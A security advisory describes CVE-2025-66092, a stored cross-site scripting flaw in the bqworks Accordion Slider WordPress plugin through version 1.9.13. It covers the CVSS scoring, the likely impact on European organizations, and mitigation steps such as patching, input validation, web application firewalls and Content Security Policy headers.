CVE-2025-66092 is a stored Cross-site Scripting (XSS) vulnerability found in the bqworks Accordion Slider plugin, a tool commonly used to create accordion-style content sliders on websites. The vulnerability stems from improper neutralization of user-supplied input during the generation of web pages, which allows malicious scripts to be stored and later executed in the context of users visiting the affected site. This flaw affects all versions of the Accordion Slider plugin up to and including version 1.9.13. The vulnerability requires an attacker to have some level of privileges (PR:L) and user interaction (UI:R) to be exploited, indicating that the attacker must be able to submit content that is then viewed by other users. The CVSS v3.1 base score is 6.5, categorized as medium severity, with the vector indicating network attack vector (AV:N), low attack complexity (AC:L), partial confidentiality, integrity, and availability impacts (C:L/I:L/A:L), and scope change (S:C). Although no known exploits have been reported in the wild, the vulnerability poses a risk of session hijacking, defacement, or redirection to malicious sites if exploited. The vulnerability is particularly relevant for websites using the Accordion Slider plugin, which is often deployed on WordPress-based sites. Given the nature of stored XSS, the impact can extend to all users who view the compromised content, potentially leading to broader compromise of user accounts and sensitive data. The lack of available patches at the time of publication necessitates immediate attention to input validation and monitoring.

For European organizations, this vulnerability can lead to unauthorized script execution within users' browsers, resulting in session hijacking, theft of sensitive information, or unauthorized actions performed on behalf of legitimate users. This can damage organizational reputation, lead to data breaches, and disrupt service availability. Organizations relying on WordPress websites with the Accordion Slider plugin are particularly vulnerable. The scope of impact includes web portals, intranets, and customer-facing websites, potentially affecting both internal users and external customers. Given the medium severity, the risk is moderate but can escalate if combined with other vulnerabilities or social engineering attacks. The requirement for user interaction and privileges limits the ease of exploitation but does not eliminate risk, especially in environments with multiple contributors or less stringent access controls. Additionally, the scope change indicates that exploitation can affect components beyond the initially vulnerable plugin, potentially compromising broader application functionality.

1. Monitor official bqworks and WordPress plugin repositories for patches addressing CVE-2025-66092 and apply updates promptly once available. 2. Implement strict input validation and output encoding on all user-supplied data, especially content submitted through the Accordion Slider interface. 3. Restrict plugin usage to trusted users with minimal necessary privileges to reduce the risk of malicious content submission. 4. Deploy Web Application Firewalls (WAFs) configured to detect and block common XSS payloads targeting the Accordion Slider plugin. 5. Conduct regular security audits and code reviews focusing on input handling in customizations involving the plugin. 6. Educate content contributors about the risks of injecting untrusted content and enforce content moderation policies. 7. Where feasible, consider replacing the Accordion Slider plugin with alternative, actively maintained plugins with better security track records. 8. Monitor web server and application logs for unusual activities indicative of attempted XSS exploitation. 9. Employ Content Security Policy (CSP) headers to limit the impact of potential XSS attacks by restricting script execution sources.